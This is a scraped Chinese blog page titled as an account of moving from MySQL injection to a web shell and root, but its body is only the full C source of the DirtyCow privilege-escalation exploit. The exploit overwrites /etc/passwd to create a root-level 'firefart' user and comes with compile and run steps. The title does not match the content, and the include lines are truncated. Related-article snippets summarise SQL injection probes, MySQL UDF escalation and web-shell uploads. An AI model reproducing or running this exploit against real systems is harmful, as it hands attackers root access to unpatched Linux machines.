mysql 注入 提权_记一次安全测试从sql注入到getshell到root提权

最新推荐文章于 2023-05-29 20:57:39 发布
最新推荐文章于 2023-05-29 20:57:39 发布
阅读量352 收藏
点赞数 1
文章标签: mysql 注入 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_27207591/article/details/113210545
版权

//

// This exploit uses the pokemon exploit of the dirtycow vulnerability

// as a base and automatically generates a new passwd line.

// The user will be prompted for the new password when the binary is run.

// The original /etc/passwd file is then backed up to /tmp/passwd.bak

// and overwrites the root account with the generated line.

// After running the exploit you should be able to login with the newly

// created user.

//

// To use this exploit modify the user values according to your needs.

//   The default is "firefart".

//

// Original exploit (dirtycow's ptrace_pokedata "pokemon" method):

//   https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c

//

// Compile with:

//   gcc -pthread dirty.c -o dirty -lcrypt

//

// Then run the newly create binary by either doing:

//   "./dirty" or "./dirty my-new-password"

//

// Afterwards, you can either "su firefart" or "ssh firefart@..."

//

// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!

//   mv /tmp/passwd.bak /etc/passwd

//

// Exploit adopted by Christian "FireFart" Mehlmauer

// https://firefart.at

//

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

const char *filename = "/etc/passwd";

const char *backup_filename = "/tmp/passwd.bak";

const char *salt = "firefart";

int f;

void *map;

pid_t pid;

pthread_t pth;

struct stat st;

struct Userinfo {

char *username;

char *hash;

int user_id;

int group_id;

char *info;

char *home_dir;

char *shell;

};

char *generate_password_hash(char *plaintext_pw) {

return crypt(plaintext_pw, salt);

}

char *generate_passwd_line(struct Userinfo u) {

const char *format = "%s:%s:%d:%d:%s:%s:%s\n";

int size = snprintf(NULL, 0, format, u.username, u.hash,

u.user_id, u.group_id, u.info, u.home_dir, u.shell);

char *ret = malloc(size + 1);

sprintf(ret, format, u.username, u.hash, u.user_id,

u.group_id, u.info, u.home_dir, u.shell);

return ret;

}

void *madviseThread(void *arg) {

int i, c = 0;

for(i = 0; i < 200000000; i++) {

c += madvise(map, 100, MADV_DONTNEED);

}

printf("madvise %d\n\n", c);

}

int copy_file(const char *from, const char *to) {

// check if target file already exists

if(access(to, F_OK) != -1) {

printf("File %s already exists! Please delete it and run again\n",

to);

return -1;

}

char ch;

FILE *source, *target;

source = fopen(from, "r");

if(source == NULL) {

return -1;

}

target = fopen(to, "w");

if(target == NULL) {

fclose(source);

return -1;

}

while((ch = fgetc(source)) != EOF) {

fputc(ch, target);

}

printf("%s successfully backed up to %s\n",

from, to);

fclose(source);

fclose(target);

return 0;

}

int main(int argc, char *argv[])

{

// backup file

int ret = copy_file(filename, backup_filename);

if (ret != 0) {

exit(ret);

}

struct Userinfo user;

// set values, change as needed

user.username = "firefart";

user.user_id = 0;

user.group_id = 0;

user.info = "pwned";

user.home_dir = "/root";

user.shell = "/bin/bash";

char *plaintext_pw;

if (argc >= 2) {

plaintext_pw = argv[1];

printf("Please enter the new password: %s\n", plaintext_pw);

} else {

plaintext_pw = getpass("Please enter the new password: ");

}

user.hash = generate_password_hash(plaintext_pw);

char *complete_passwd_line = generate_passwd_line(user);

printf("Complete line:\n%s\n", complete_passwd_line);

f = open(filename, O_RDONLY);

fstat(f, &st);

map = mmap(NULL,

st.st_size + sizeof(long),

PROT_READ,

MAP_PRIVATE,

f,

0);

printf("mmap: %lx\n",(unsigned long)map);

pid = fork();

if(pid) {

waitpid(pid, NULL, 0);

int u, i, o, c = 0;

int l=strlen(complete_passwd_line);

for(i = 0; i < 10000/l; i++) {

for(o = 0; o < l; o++) {

for(u = 0; u < 10000; u++) {

c += ptrace(PTRACE_POKETEXT,

pid,

map + o,

*((long*)(complete_passwd_line + o)));

}

}

}

printf("ptrace %d\n",c);

}

else {

pthread_create(&pth,

NULL,

madviseThread,

NULL);

ptrace(PTRACE_TRACEME);

kill(getpid(), SIGSTOP);

pthread_join(pth,NULL);

}

printf("Done! Check %s to see if the new user was created.\n", filename);

printf("You can log in with the username '%s' and the password '%s'.\n\n",

user.username, plaintext_pw);

printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",

backup_filename, filename);

return 0;

}

FoxNewsAI
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
升-MYSQL数据库
m0_65336233的博客
12-05 1758
漏洞-数据库
mysql总结
weixin_45605374的博客
12-12 706
udf UDF(user defined function)用户定义函数,是mysql的一次拓展连接⼝。用户可以通过自定义函数实现在mysql中⽆法例实现的功能,其新函数都可以在sql语句中添加中调使⽤,像调⽤本机函数⼀样。 前条件 已经获取到数据库的账号、密码,可以远程连接到 mysql有写入文件的限,即secure_file_priv的值为空。 show global variables like 'secure%'; mysql版本区别 1、MySQL<5.0,导出路径随意;
mysql注入到命令执行 |
Sp4rkW的博客
03-01 3713
文章首发公众号:闪光的自留地 知乎:Sp4rkW GITHUB:Sp4rkW B站:一只技术君 博客:https://sp4rkw.blog.csdn.net/ 联系邮箱:[email protected] 前言 这篇博客主要是最近面试遇到的
Windows:利用MySQL数据库
qq_61553520的博客
05-29 870
udf = 'user defined function',即‘用户自定义函数是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat()。
SQL注入-基于MySQL注入(十七)
Gjqhs的博客
02-22 3037
实验目的 普及结合dll文件对Windows系统进行UDF,掌握UDF的基本思路,熟悉UDF的主要方法。PS:面试时不要说打靶场什么东西,就说创建用户,文件执行什么之类的 基本概念 通过某种方式将低限用户升为高限用户的过程。 注入 一般指的是在掌控了某数据库账户的情况下,通过SQL注入等方式升该账户的 限,进而夺得服务器(操作系统)的控制 Windows2003操作系统—一默认用户 System:本地机器上拥有最高限的用户,普通用户管理工具查看不到 Adminis
mysql.zip_ROOT_mysql_udf_udf mysql_
09-19
用的 udf 得到root帐号可以用这个
MYSQL.rar_MYSQL_ROOT_mysql root_root-Cyclic-Music_sql
09-22
4、首先以root用户的身份连接到服务器: shell> mysql -u root -p Enter password:******* 出现Enter password后输入root用户的密码,然后即进入mysql客户机的交互模式,可以看到下面的示: Welcome to the...
udf_udf_udf.dll下载_mysql_ballsv6__源码
10-04
mysql,udf所需要的dll文件,有64位和32位
mysql数据库所需lib_mysqludf_sys_64.dll(64位)
10-03
必备,之后会出对应的教程
php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击
10-20
主要介绍了php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击的相关资料,需要的朋友可以参考下
mysql注入命令
12-03
mysql注入命令 php类型的网站很多都存在MYSQL注入漏洞,而利用注入来获取限的方法又多种多样。本文以mysql中支持的SCHEMATA库为例讲述mysql注入高级暴库用户密码
大合集(服务器安全测试工具包)
11-27
保证是目前网络上最全的收集(内含163个XDay工具),几乎通杀!仅用于自己服务器的安全测试,请勿用作非法用途,后果自负!
暗月mysql全版本通杀
06-21
暗月mysql全版本通杀
数据库注入总结(二)
合天网安学院
08-10 1065
MOF 是一个有历史的漏洞,基本上在 Windows Server 2003的环境下才可以成功。UDF说白了就是自定义函数,是数据库功能的一种扩展。用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用,就像调用本机函数 version() 等方便。......
MySQL
m0_58606546的博客
11-28 5701
MySQL的必要条件: 具有MySQLroot限,且MySQL以system限运行。 具有执行SQL语句的限。 获取root密码的方法: 查看数据库配置文件关键字:config、conn、sql、data、inc、database等 下载mysql安装路径下的数据文件 安装路径下的data目录中存放的是数据库的数据信息 root账号密码存储在mysql数据库下的user表中 完整路径=安装路径+\data\mysql\user.MYD 3.暴力破解 MySQL数据库...
mysql sql注入
u012684933的专栏
05-23 3465
可以通过上传一句话木马的方式实现sql注入
sql注入
qq_33441500的博客
12-22 2453
1.发现SQL注入位置 1)整型参数的判断 永假条件:?p=1 and 1=2 永真条件:?p=1 and 1=1 空条件:?p=1 or 1=1 2)字符型参数的判断 永假条件:?p=1’ and ‘1’='2 永真条件:?p=1’ and ‘1’='1 空条件:?p=1’ or ‘1’='1 3)过滤特殊字符的判断 确认过滤了# http://localhost/sqli-labs/Less-...
mysql限用户getshell_渗透实战之都是Mysql惹的祸
weixin_39601929的博客
12-23 679
本文纯属虚构,如有雷同,纯属巧合!一、目标目标是拿shell主站,旁站,找了两套相似的代码审计,都未能直接找到getshell漏洞,都是些注入啥的,因为目标部署用宝塔,创建数据库时默认是低限,也就不存在注入getshell了二、转机在一个旁站扫描到网站备份文件,看了下数据库配置文件直接外网链接试试,我去,直接登进去数据库了可惜同样数据库不是DBA,还是没办法getshell三、突破看了...
mysql注入getshell
weixin_33973600的博客
08-26 799
SQL注入就是一种通过操作输入(可以是表单,可以是get请求,也可以是POST请求等)相关SQL语句,并且能让该语句在数据库中得以执行,从而进行***的技术。最主要的原因就是没有对用户输入数据的合法性或者说是客户端交的可变参数进行严格的检查和过滤,从而导致应用程序存在该漏洞。这篇文章主要是讲述通过一个mysql注入漏洞,通过os-shell执行echo命令获取web...
shell连接mysql
最新发布
08-12
总结:通过在shell中使用mysql命令行工具,您可以方便地连接到MySQL服务器并执行各种MySQL命令。这是一种用于与MySQL数据库交互的常见方法。 ### 回答3: 在shell中连接MySQL数据库可以通过以下步骤实现: 1. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值